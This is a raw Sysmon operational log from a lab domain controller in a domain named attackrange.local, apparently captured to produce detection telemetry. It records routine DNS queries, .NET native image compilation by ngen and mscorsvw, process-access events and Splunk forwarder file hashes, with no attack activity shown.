21:01:15.848{4DB9351A-9DDB-60D3-0B00-00000000CF01}628DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 
354300x800000000000000018937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.844{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local56995- 354300x800000000000000018936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.844{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60447- 354300x800000000000000018935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.843{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49962- 354300x800000000000000018934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.841{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49381- 354300x800000000000000018933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.840{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60254- 11241100x800000000000000018932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:17.827{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1610-0\System.Reflection.Context.dll2021-06-23 21:01:17.827 
23542300x800000000000000018931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=795337EBBF5956EA10B0D4333B6509DE,SHA256=918DF28B54007E38945DE7955F48C0688741BF067C660706D2E829556BD05042,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.654{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x800000000000000018928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.654{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.623{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37A60AB4E97412AAC8E10D46F55076CF,SHA256=965038EBEDD0749C0FE877CCD4C20B948F130A5368E71E36F8F7C3C6C02B3FD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:17.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.560{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:17.560{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8402-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.498{4DB9351A-A11C-60D3-8302-00000000CF01}6252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\W56GVWCW12\System.Printing.ni.dll.auxMD5=BE8FE718251EAC27EF18D851C78DC7F3,SHA256=656706A64AB7CCBF3D83BB132148CE8C16B25FD3BF900B5A4BC7F0E5CCC00989,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.482{4DB9351A-A11C-60D3-8302-00000000CF01}6252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\W56GVWCW12\System.Printing.ni.dllMD5=9EC159AC4980BFE3FACF498EECB48BE4,SHA256=E29D2F08161C92B0C8B6728525B26665B7FA76E1D88BBEE9BAB000A287071BB4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:17.451{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\186c-0\System.Printing.dll2021-06-23 21:01:17.451 23542300x800000000000000018977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.951{4DB9351A-A11E-60D3-8B02-00000000CF01}7156NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68REWFTSHZ\System.Runtime.Serialization.Formatters.Soap.ni.dll.auxMD5=14728FE0E93419D5570911F529CC7DC3,SHA256=DBE1E91C843CEE9832808D1A2FB5DB2FAB6137638AB0F9779774F28098153F71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.951{4DB9351A-A11E-60D3-8B02-00000000CF01}7156NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68REWFTSHZ\System.Runtime.Serialization.Formatters.Soap.ni.dllMD5=AED35C076E2447686C44DA0B77BED8B9,SHA256=CABF23415564A6C8FC20BF381B7D6722918DFC22E84951F9D10BB0895E340B68,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:01:18.935{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bf4-0\System.Runtime.Serialization.Formatters.Soap.dll2021-06-23 21:01:18.935 10341000x800000000000000018974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:18.701{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8B02-00000000CF01}7156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000018970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06B20C8535856BAFFD4E16B85B33D615,SHA256=BC625020BD847E7CB99FE5C7CB5D26884F5B54F24E05167678339675D2AD9C00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.654{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:18.654{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8A02-00000000CF01}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.607{4DB9351A-A11E-60D3-8902-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R8C4ULFFWB\System.Runtime.DurableInstancing.ni.dll.auxMD5=DEDE93EF02B00C1EC460CE8546A9E1BD,SHA256=919C998D2DE521B98CE32469DF82AD630BDB4AD97E97FF7AA5B7E9909220F8C9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.592{4DB9351A-A11E-60D3-8902-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R8C4ULFFWB\System.Runtime.DurableInstancing.ni.dllMD5=63B25CAB80B7979234AE6E59094BD551,SHA256=25DED5BC1D407EDDA0564ED913BED34EFD40B592757CCD01BA49837F662D1B00,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:18.576{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15d8-0\System.Runtime.DurableInstancing.dll2021-06-23 21:01:18.576 10341000x800000000000000018964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:18.310{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.310{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8902-00000000CF01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:18.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.232{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:18.232{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11E-60D3-8802-00000000CF01}216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 